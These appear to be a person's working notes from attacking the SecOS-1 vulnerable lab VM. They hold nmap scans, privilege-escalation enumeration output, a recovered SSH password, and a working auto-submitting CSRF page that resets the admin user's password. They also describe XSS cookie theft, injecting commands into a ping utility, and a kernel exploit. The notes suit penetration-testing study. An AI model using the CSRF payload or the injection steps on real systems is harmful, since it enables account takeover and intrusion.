Walkthru:
Notes:
A. https://c0d3g33k.blogspot.com/2017/01/secos.html [capture admin cookie using 127.0.0.1 in a code test.html with cross site scripting vulnerability, CSRF attack, use exploit 37088 for priv escalation]
B. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [Hacking Node.js and MangoDB ]
c. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [use wget to post data from CLI. Add other cmds to ping cmd using curl and wget]
D. https://chousensha.github.io/blog/2015/02/04/pentest-lab-secos/ [SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI]
Notes:
# Nmap 7.70 scan initiated Thu Jul 19 09:26:05 2018 as: nmap -sV -O -oN ../reports/192.168.117.6/192.168.117.6.nmap 192.168.117.6
Nmap scan report for 192.168.117.6
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
8081/tcp open http Node.js (Express middleware)
MAC Address: 08:00:27:60:50:A9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 19 09:26:13 2018 -- 1 IP address (1 host up) scanned in 8.05 seconds
000000000000000000000000000000000000000000000000000
root@kali:~/reports/192.168.117.6# cat ssh_192.168.117.6.nmap
# Nmap 7.70 scan initiated Thu Jul 19 09:26:14 2018 as: nmap -sV -Pn -p 22 --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN ../reports/192.168.117.6/ssh_192.168.117.6.nmap 192.168.117.6
Nmap scan report for 192.168.117.6
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 1024 9b:d9:32:f5:1d:19:88:d3:e7:af:f0:4e:21:76:7a:c8 (DSA)
| 2048 90:b0:3d:99:ed:5b:1b:e1:d4:e6:b5:dd:e9:70:89:f5 (RSA)
| 256 78:2a:d9:e3:63:83:24:dc:2a:d4:f6:4a:ac:2c:70:5a (ECDSA)
|_ 256 a1:77:7b:f2:31:0b:81:ce:f2:09:47:06:e6:b0:80:fa (ED25519)
|_ssh-run: Failed to specify credentials and command to run.
MAC Address: 08:00:27:60:50:A9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 19 09:26:14 2018 -- 1 IP address (1 host up) scanned in 0.89 seconds
root@kali:~/reports/192.168.117.6#
000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000
Notes:
A. https://c0d3g33k.blogspot.com/2017/01/secos.html [capture admin cookie using 127.0.0.1 in a code test.html with cross site scripting vulnerability, CSRF attack, use exploit 37088 for priv escalation]
B. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [Hacking Node.js and MangoDB ]
c. http://oldsmokingjoe.blogspot.com/2016/01/walkthrough-secos-1.html [use wget to post data from CLI. Add other cmds to ping cmd using curl and wget]
D. https://chousensha.github.io/blog/2015/02/04/pentest-lab-secos/ [SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI]
Notes:
# Nmap 7.70 scan initiated Thu Jul 19 09:26:05 2018 as: nmap -sV -O -oN ../reports/192.168.117.6/192.168.117.6.nmap 192.168.117.6
Nmap scan report for 192.168.117.6
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
8081/tcp open http Node.js (Express middleware)
MAC Address: 08:00:27:60:50:A9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 19 09:26:13 2018 -- 1 IP address (1 host up) scanned in 8.05 seconds
000000000000000000000000000000000000000000000000000
# Nmap 7.70 scan initiated Thu Jul 19 09:26:14 2018 as: nmap -sV -Pn -p 22 --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN ../reports/192.168.117.6/ssh_192.168.117.6.nmap 192.168.117.6
Nmap scan report for 192.168.117.6
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 1024 9b:d9:32:f5:1d:19:88:d3:e7:af:f0:4e:21:76:7a:c8 (DSA)
| 2048 90:b0:3d:99:ed:5b:1b:e1:d4:e6:b5:dd:e9:70:89:f5 (RSA)
| 256 78:2a:d9:e3:63:83:24:dc:2a:d4:f6:4a:ac:2c:70:5a (ECDSA)
|_ 256 a1:77:7b:f2:31:0b:81:ce:f2:09:47:06:e6:b0:80:fa (ED25519)
|_ssh-run: Failed to specify credentials and command to run.
MAC Address: 08:00:27:60:50:A9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 19 09:26:14 2018 -- 1 IP address (1 host up) scanned in 0.89 seconds
root@kali:~/reports/192.168.117.6#
000000000000000000000000000000000000000000000000000
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-19 09:46 CDT
Nmap scan report for 192.168.117.6
Host is up (0.000063s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
8081/tcp open blackice-icecap
MAC Address: 08:00:27:60:50:A9 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.22 seconds
SecureWebApp users
spiderman---admin user
pirate
test
john
pop /123
/hint in the signup page...tried to repeat VM 10 by cookie grabing code but not getting the code on the kali. Can see the attempts from victim to Kali with 200 code and but not the value of cookie
000000000000000000000000000000000000000000000000000
here is the test.html that would be serve to user spiderman when he tries to access our email. Copy it on the Kali and start python web server. CSRF attack
<html> <body> <form name="changepass" method="post" action="http://127.0.0.1:8081/change-password"> <input type="hidden" name="username" value="spiderman"> <input type="hidden" name="password" value="abc123"> </form> <script type="text/javascript"> document.changepass.submit(); </script> </body> </html>
[more info abt script at https://haacked.com/archive/2009/04/02/anatomy-of-csrf-attack.aspx/]
000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000
spiderman@SecOS-1:/tmp$ netstat -plnt
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 760/node
tcp 0 0 127.0.0.1:28017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
spiderman@SecOS-1:/tmp$ curl 127.0.0.1:9000
shows a page in html with a ping utility. may be we can add
from walkthru C . use wget to post data from CLI. Add other cmds to ping cmd
000000000000000000000000000000000000000000000000000
after logging in as spiderman, will get you ssh pwd for spiderman which is CrazyPassword!000000000000000000000000000000000000000000000000000
root@kali:~/reports/192.168.117.6# cat linuxprivchecker.output
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.13.0-24-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014
[+] Hostname
SecOS-1
[+] Operating System
Ubuntu 14.04 LTS \n \l
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 08:00:27:60:50:a9
inet addr:192.168.117.6 Bcast:192.168.117.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe60:50a9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
TX packets:911 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:191641 (191.6 KB) TX bytes:327145 (327.1 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2622 errors:0 dropped:0 overruns:0 frame:0
TX packets:2622 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:5708674 (5.7 MB) TX bytes:5708674 (5.7 MB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 776/node
tcp 0 0 127.0.0.1:28017 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:41053 127.0.0.1:27017 ESTABLISHED -
tcp 0 0 192.168.117.6:22 192.168.117.4:36750 ESTABLISHED -
tcp 0 0 127.0.0.1:49791 127.0.0.1:8081 ESTABLISHED 1260/phantomjs
tcp 0 0 127.0.0.1:41054 127.0.0.1:27017 ESTABLISHED -
tcp 0 0 127.0.0.1:41050 127.0.0.1:27017 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:27017 127.0.0.1:41051 ESTABLISHED -
tcp 0 0 127.0.0.1:41048 127.0.0.1:27017 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:41055 127.0.0.1:27017 ESTABLISHED -
tcp 0 0 127.0.0.1:8081 127.0.0.1:49790 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:27017 127.0.0.1:41048 ESTABLISHED -
tcp 0 0 127.0.0.1:27017 127.0.0.1:41053 ESTABLISHED -
tcp 0 0 127.0.0.1:41051 127.0.0.1:27017 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:41049 127.0.0.1:27017 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:41057 127.0.0.1:27017 ESTABLISHED -
tcp 0 0 127.0.0.1:8081 127.0.0.1:49789 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:41052 127.0.0.1:27017 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:27017 127.0.0.1:41056 ESTABLISHED -
tcp 0 0 127.0.0.1:49789 127.0.0.1:8081 ESTABLISHED 1260/phantomjs
tcp 0 0 127.0.0.1:41056 127.0.0.1:27017 ESTABLISHED -
tcp 0 0 127.0.0.1:27017 127.0.0.1:41052 ESTABLISHED -
tcp 0 0 127.0.0.1:49790 127.0.0.1:8081 ESTABLISHED 1260/phantomjs
tcp 0 0 127.0.0.1:27017 127.0.0.1:41054 ESTABLISHED -
tcp 0 0 127.0.0.1:49798 127.0.0.1:8081 ESTABLISHED 1318/phantomjs
tcp 0 0 127.0.0.1:8081 127.0.0.1:49798 ESTABLISHED 776/node
tcp 0 0 127.0.0.1:27017 127.0.0.1:41057 ESTABLISHED -
tcp 0 0 127.0.0.1:27017 127.0.0.1:41050 ESTABLISHED -
tcp 0 0 127.0.0.1:27017 127.0.0.1:41055 ESTABLISHED -
tcp 0 0 127.0.0.1:27017 127.0.0.1:41049 ESTABLISHED -
tcp 0 0 127.0.0.1:8081 127.0.0.1:49791 ESTABLISHED 776/node
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:41952 0.0.0.0:* -
udp6 0 0 :::57764 :::* -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.117.0 * 255.255.255.0 U 0 0 0 eth0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
/dev/mapper/SecOS--1--vg-root on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sda1 on /boot type ext2 (rw)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
/dev/mapper/SecOS--1--vg-root / ext4 errors=remount-ro 0 1
# /boot was on /dev/sda1 during installation
UUID=5da58594-05b3-4eac-8fee-4d6f6881d207 /boot ext2 defaults 0 2
/dev/mapper/SecOS--1--vg-swap_1 none swap sw 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 Apr 25 2014 .
drwxr-xr-x 90 root root 4096 Jul 20 06:41 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
/etc/cron.daily:
total 72
drwxr-xr-x 2 root root 4096 Apr 25 2014 .
drwxr-xr-x 90 root root 4096 Jul 20 06:41 ..
-rwxr-xr-x 1 root root 376 Apr 4 2014 apport
-rwxr-xr-x 1 root root 15481 Apr 10 2014 apt
-rwxr-xr-x 1 root root 314 Feb 18 2014 aptitude
-rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils
-rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg
-rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate
-rwxr-xr-x 1 root root 1261 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate
-rwxr-xr-x 1 root root 249 Feb 17 2014 passwd
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest
-rwxr-xr-x 1 root root 214 Apr 10 2014 update-notifier-common
-rwxr-xr-x 1 root root 322 Apr 11 2014 upstart
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 25 2014 .
drwxr-xr-x 90 root root 4096 Jul 20 06:41 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Apr 25 2014 .
drwxr-xr-x 90 root root 4096 Jul 20 06:41 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 Apr 25 2014 .
drwxr-xr-x 90 root root 4096 Jul 20 06:41 ..
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Apr 10 2014 man-db
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 211 Apr 10 2014 update-notifier-common
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
07:04:55 up 23 min, 1 user, load average: 0.15, 0.18, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
spiderma pts/0 192.168.117.4 06:55 7.00s 0.12s 0.00s /bin/sh -c w 2>/dev/null
[+] Super Users Found:
root
[+] Environment
LESSOPEN=| /usr/bin/lesspipe %s
MAIL=/var/mail/spiderman
SSH_CLIENT=192.168.117.4 36750 22
USER=spiderman
LANGUAGE=en_US:en
SHLVL=1
HOME=/home/spiderman
SSH_TTY=/dev/pts/0
LOGNAME=spiderman
_=/usr/bin/python
XDG_SESSION_ID=1
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/home/spiderman
SSH_CONNECTION=192.168.117.4 36750 192.168.117.6 22
[+] Root and current user history (depends on privs)
-rw------- 1 spiderman spiderman 5 May 7 2014 /home/spiderman/.bash_history
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
secosadmin:x:1000:1000:secosadmin,,,:/home/secosadmin:/bin/bash
mongodb:x:105:65534::/home/mongodb:/bin/false
spiderman:x:1001:1001:Peter Parker,1337,1337,1337,l33t:/home/spiderman:/bin/bash
[+] Current User
spiderman
[+] Current User ID
uid=1001(spiderman) gid=1001(spiderman) groups=1001(spiderman)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 4096 Apr 26 2014 /var/tmp
drwxrwxrwt 2 root root 4096 Jul 20 03:36 /var/crash
drwxrwxrwt 2 root root 4096 Jul 20 07:04 /tmp
drwxrwxrwt 2 root root 40 Jul 20 06:41 /run/shm
drwxrwxrwt 3 root root 60 Jul 20 06:41 /run/lock
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
--w--w--w- 1 root root 0 Jul 20 06:55 /sys/fs/cgroup/systemd/user/1001.user/1.session/cgroup.event_control
--w--w--w- 1 root root 0 Jul 20 06:55 /sys/fs/cgroup/systemd/user/1001.user/cgroup.event_control
--w--w--w- 1 root root 0 Jul 20 06:55 /sys/fs/cgroup/systemd/user/cgroup.event_control
--w--w--w- 1 root root 0 Jul 20 06:41 /sys/fs/cgroup/systemd/cgroup.event_control
-rw-rw-rw- 1 root root 0 Jul 20 06:41 /sys/kernel/security/apparmor/.access
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
-rwxr-sr-x 1 root shadow 30432 Jan 31 2014 /sbin/unix_chkpwd
drwxr-s--- 2 root dip 4096 Apr 25 2014 /etc/ppp/peers
drwxr-s--- 2 root dip 4096 Apr 25 2014 /etc/chatscripts
drwxr-sr-x 34 man root 4096 Apr 26 2014 /var/cache/man
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/da
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/da/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/da/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/da/cat1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat5
drwxr-sr-x 6 man root 4096 Apr 26 2014 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cs/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cs/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cs/cat7
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cs/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/it/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/it/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/it/cat1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat8
drwxr-sr-x 4 man root 4096 Apr 26 2014 /var/cache/man/fr.ISO8859-1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fr.ISO8859-1/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fr.ISO8859-1/cat7
drwxr-sr-x 3 man root 4096 Apr 26 2014 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/gl/cat8
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/es/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/es/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/es/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/id/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/id/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/id/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ru/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ru/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ru/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/zh_TW/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/zh_TW/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/zh_TW/cat1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat3
drwxr-sr-x 4 man root 4096 Apr 26 2014 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/sl/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/sl/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/zh_CN/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/zh_CN/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/zh_CN/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fr/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fr/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fr/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pl/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pl/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pl/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pt/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pt/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pt/cat1
drwxr-sr-x 4 man root 4096 Apr 26 2014 /var/cache/man/fr.UTF-8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fr.UTF-8/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fr.UTF-8/cat7
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ja/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ja/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ja/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/tr/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/tr/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/tr/cat1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat6
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat4
drwxr-sr-x 4 man root 4096 Apr 26 2014 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fi/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/fi/cat1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat7
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/nl
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/nl/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/nl/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/nl/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/sv/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/sv/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/sv/cat1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pt_BR/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pt_BR/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/pt_BR/cat1
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/cat2
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ko/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ko/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/ko/cat1
drwxr-sr-x 6 man root 4096 Apr 26 2014 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/de/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/de/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/de/cat3
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/de/cat1
drwxr-sr-x 5 man root 4096 Apr 26 2014 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/hu/cat5
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/hu/cat8
drwxr-sr-x 2 man root 4096 Apr 25 2014 /var/cache/man/hu/cat1
drwxrwsr-x 2 root staff 4096 Apr 11 2014 /var/local
drwxrwsr-x 2 root mail 4096 Apr 16 2014 /var/mail
drwxrwsr-x 2 libuuid libuuid 4096 Apr 16 2014 /var/lib/libuuid
-rwsr-xr-x 1 root root 67704 Apr 16 2014 /bin/umount
-rwsr-xr-x 1 root root 35300 Feb 17 2014 /bin/su
-rwsr-xr-x 1 root root 30112 Dec 16 2013 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Apr 16 2014 /bin/mount
-rwsr-sr-x 1 libuuid libuuid 17996 Apr 16 2014 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 322968 Jan 22 2013 /usr/sbin/pppd
-rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
